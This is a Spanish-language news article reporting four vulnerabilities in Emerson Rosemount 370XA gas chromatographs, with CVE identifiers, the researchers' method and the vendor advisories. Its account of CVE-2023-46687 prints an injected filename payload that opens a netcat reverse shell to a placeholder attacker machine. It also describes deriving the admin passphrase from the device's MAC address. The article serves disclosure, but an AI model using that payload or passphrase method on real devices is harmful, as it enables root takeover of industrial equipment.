Seguridad de endpoints, gobernanza y gestión de riesgos, seguridad de Internet de las cosas Las fallas de gravedad crítica exponen los dispositivos de Emerson a ciberataquesPrajeet Nair (@prajeetspeaks) • 28 de junio de 2024 Imagen: Shutterstock Varias vulnerabilidades críticas en los cromatógrafos de gases de Emerson podrían permitir que actores maliciosos accedan a datos confidenciales, provoquen condiciones de denegación de servicio y ejecuten comandos arbitrarios. Ver también: SASE: Reconocer los desafíos de proteger una fuerza de trabajo híbrida Los cromatógrafos de gases, que se utilizan para analizar y separar compuestos químicos, son herramientas integrales en varias industrias, incluidos los sectores químico, ambiental y de atención médica. El Emerson Rosemount 370XA, un modelo ampliamente utilizado, se basa en un protocolo propietario para la comunicación entre el dispositivo y la computadora del técnico. Los investigadores de seguridad de Team82, de la firma de seguridad de tecnología operativa Claroty, identificaron cuatro vulnerabilidades clave: dos fallas de inyección de comandos, una omisión de autenticación y una vulnerabilidad de autorización. Una falla de inyección de comandos recibió una puntuación CVSS v3 de 9,8, lo que indica su gravedad crítica. La vulnerabilidad, identificada como CVE-2023-46687, es una vulnerabilidad de ejecución de código remoto no autenticado o inyección de comandos que se encuentra en la implementación del tipo de comando de «calibración forzada». La vulnerabilidad está vinculada a una función del sistema que se llama con un comando de shell construido e incluye un nombre de archivo proporcionado por el usuario, sin la limpieza adecuada. Esto permite a un atacante inyectar comandos de shell arbitrarios. El atacante puede explotar esto proporcionando una entrada diseñada como gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, que da como resultado la ejecución de código arbitrario en el contexto del shell raíz. Otra vulnerabilidad, identificada como CVE-2023-51761, es una vulnerabilidad de omisión de autenticación que permite a un atacante omitir la autenticación calculando una frase de contraseña secreta para restablecer la contraseña de administrador. La frase de contraseña se deriva de la dirección MAC del dispositivo, que no es información secreta y se puede obtener fácilmente. Al comprender el procedimiento de validación de la frase de contraseña, un atacante puede generar la frase de contraseña utilizando la dirección MAC e iniciar sesión con privilegios de administrador utilizando credenciales con el formato EMERSON/{PASSPHRASE}. La vulnerabilidad identificada como CVE-2023-49716 es una omisión del inicio de sesión del usuario a través de un mecanismo de restablecimiento de contraseña. Esta vulnerabilidad permite a un usuario no autenticado con acceso a la red omitir la autenticación y adquirir capacidades de administrador. La última vulnerabilidad abordada se identifica como CVE-2023-43609 y es una inyección de comandos a través de la funcionalidad de reinicio. Esta falla permite a un usuario autenticado con acceso a la red ejecutar comandos arbitrarios desde una computadora remota. Debido al alto costo y la dificultad de obtener un dispositivo físico, los investigadores emularon el Emerson Rosemount 370XA para su análisis. Identificaron fallas en la implementación del protocolo del dispositivo, lo que les permitió crear cargas útiles y descubrir las vulnerabilidades. La vulnerabilidad de omisión de autenticación, por ejemplo, permitió a los atacantes calcular una frase de contraseña secreta y restablecer las contraseñas de administrador, comprometiendo la seguridad del sistema. Emerson recomendó en un aviso de seguridad que los usuarios finales actualicen el firmware de los productos. La Agencia de Seguridad de Infraestructura y Ciberseguridad también ha publicado un aviso sobre las fallas. URL original de la publicación: https://www.databreachtoday.com/multiple-vulnerabilities-found-in-gas-chromatographs-a-25655